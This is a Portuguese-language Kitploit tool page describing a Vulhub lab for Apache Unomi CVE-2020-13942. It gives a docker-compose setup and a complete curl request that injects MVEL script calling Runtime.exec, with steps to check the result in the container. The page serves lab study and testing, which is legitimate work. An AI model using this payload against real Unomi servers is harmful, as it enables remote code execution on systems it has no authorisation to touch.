Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-13942byVulHub — Ambiente de laboratório passo a passo e exploit para Apache Unomi CVE-2020-13942, demonstrando injeção de linguagem de expressão MVEL levando à execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Ambiente de laboratório passo a passo e exploit para Apache Unomi CVE-2020-13942, demonstrando injeção de linguagem de expressão MVEL levando à execução remota de código.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-13942porVulHub


Apache Unomi Injeção de Linguagem de Expressão RCE (CVE-2020-13942)

Descrição

Esta vulnerabilidade permite a execução de comandos arbitrários em sistemas que executam Apache Unomi versão 1.5.1, explorando a injeção da linguagem de expressão MVEL.

Página do projeto

GitHub - Vulhub - Unomi CVE-2020-13942


Configuração do ambiente

Arquivo Docker Compose (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

Inicialização dos containers

Execute os containers com o seguinte comando:

root@kitploit:~
docker compose up -d

Execução do exploit

Comando a executar do Kali

Envie a seguinte solicitação POST usando curl:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

Verificação do exploit

Acesso ao container

Acesse o container para verificar a criação do arquivo:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

Verificação do resultado

Verifique a presença da pasta pluto:

root@kitploit:~
hsperfdata_root  pluto

Se o arquivo pluto estiver presente, significa que o exploit foi bem-sucedido.


Notas de segurança

Esta vulnerabilidade permite a execução de comandos arbitrários. Use esses testes apenas em ambientes controlados e para fins de estudo ou verificação. Explorar vulnerabilidades em ambientes não autorizados é ilegal.

Baixar ferramenta